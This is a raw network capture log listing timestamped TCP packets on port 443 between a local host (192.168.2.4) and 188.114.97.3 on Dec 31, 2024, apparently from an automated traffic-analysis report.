                                                                                              Dec 31, 2024 08:57:13.898426056 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.898710012 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.898818016 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.898857117 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.898910046 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.898952007 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.898956060 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.899033070 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.901448011 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.901462078 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.901530027 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.901534081 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.901937962 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.901974916 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.902031898 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.902031898 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.902036905 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.902349949 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.950318098 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.950339079 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.950433016 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.950433016 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.950440884 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.950905085 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.950922966 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.950959921 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.950959921 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.950965881 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.951021910 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.951021910 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.951423883 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.951437950 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.951483011 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.951488972 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.951592922 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.953136921 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.968569040 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.968585014 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.968760014 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.968765974 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.971708059 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.985136986 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.985160112 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.985255003 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.985255003 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.985260010 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.985460043 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.985697985 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.985713005 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.985817909 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.985817909 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.985824108 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.985905886 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.988218069 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.988234043 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.988392115 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.988396883 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.988522053 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.988797903 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.988817930 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.988904953 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.988904953 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.988910913 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.989288092 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.037259102 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.037275076 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.037309885 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.037314892 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.037339926 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.037626982 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.037728071 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.037741899 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.037838936 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.037843943 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.038203955 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.038225889 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.038254976 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.038254976 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.038261890 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.038288116 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.038410902 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.055489063 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.055512905 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.055557013 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.055566072 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.055619955 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.055701971 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.079885960 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.079906940 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.079941034 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.079946995 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.079978943 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.080002069 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.080482006 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.080497980 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.080542088 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.080545902 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.080591917 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.080591917 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.083101988 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.083116055 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.083194971 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.083199024 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.083220005 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.083236933 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.117141962 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.117185116 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.117276907 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.117276907 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.117290974 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.120800972 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.124061108 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.124088049 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.124129057 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.124135971 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.124170065 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.124191999 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.124684095 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.124701023 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.124751091 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.124758005 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.124769926 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.125075102 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.125101089 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.125139952 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.125144005 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.125191927 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.128653049 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.142433882 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.142453909 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.142530918 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.142541885 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.144774914 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.156548023 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.166799068 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.166817904 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.166887045 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.166893005 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.167342901 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.167366028 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.167392969 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.167397976 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.167418003 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.167500973 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.169888973 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.169903040 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.169980049 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.169984102 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.172785044 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.203929901 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.203944921 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.204021931 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.204026937 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.204869986 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.210885048 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.210900068 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.211025953 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.211025953 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.211031914 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.211463928 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.211484909 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.211512089 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.211518049 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.211544037 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.211560965 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.211879015 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.211891890 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.211970091 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.211970091 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.211975098 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.212660074 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.229264975 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.229283094 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.229321003 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.229325056 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.229434013 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.229434013 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.229439974 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.253724098 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.253741980 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.253781080 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.253787041 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.253819942 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.254271030 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.254283905 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.254318953 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.254323959 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.254342079 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.256768942 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.256788015 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.256839037 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.256844044 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.256889105 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.290818930 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.290842056 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.290908098 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.290913105 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.290939093 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.297681093 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.297698975 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.297755003 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.297760010 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.297790051 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.298224926 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.298238039 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.298295021 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.298295021 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.298299074 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.298751116 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.298770905 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.298795938 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.298800945 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.298836946 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.316148996 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.316164017 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.316230059 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.316236973 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.340450048 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.340473890 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.340550900 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.340559959 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.340599060 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.340924978 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.340939045 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.340982914 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.340989113 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.341026068 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.343483925 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.343502998 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.343543053 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.343549013 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.343590975 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.377615929 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.377629995 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.377691031 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.377697945 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.377727985 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.384356976 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.384375095 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.384423018 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.384430885 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.384449959 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.384917974 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.384929895 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.384998083 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.385001898 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.385431051 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.385451078 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.385477066 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.385483027 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.385562897 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.402968884 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.402981997 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.403058052 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.403064013 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.427299976 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.427330971 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.427372932 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.427376986 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.427381039 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.427405119 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.427439928 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.427442074 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.427824020 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.427836895 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.427906036 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.427911043 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.430408955 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.430427074 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.430495024 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.430499077 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.430512905 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.464447975 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.464462042 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.464592934 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.464592934 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.464601994 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.471368074 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.471385956 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.471429110 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.471436024 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.471467018 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.471921921 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.471934080 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.472007990 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.472007990 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.472013950 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.472345114 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.472362041 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.472388029 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.472393036 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.472414970 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.489850044 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.489865065 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.489947081 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.489953041 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.489960909 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.514214993 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.514234066 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.514307976 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.514314890 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.514333963 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.514642000 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.514655113 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.514698029 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.514700890 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.514738083 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.517000914 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.517041922 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.517065048 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.517069101 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.517093897 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.551100969 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.551115990 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.551198006 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.551206112 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.559571981 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.559597969 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.559642076 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.559648991 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.559664011 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.560112953 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.560127020 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.560157061 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:14.560162067 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:14.560198069 CET49735443192.168.2.4188.114.97.3
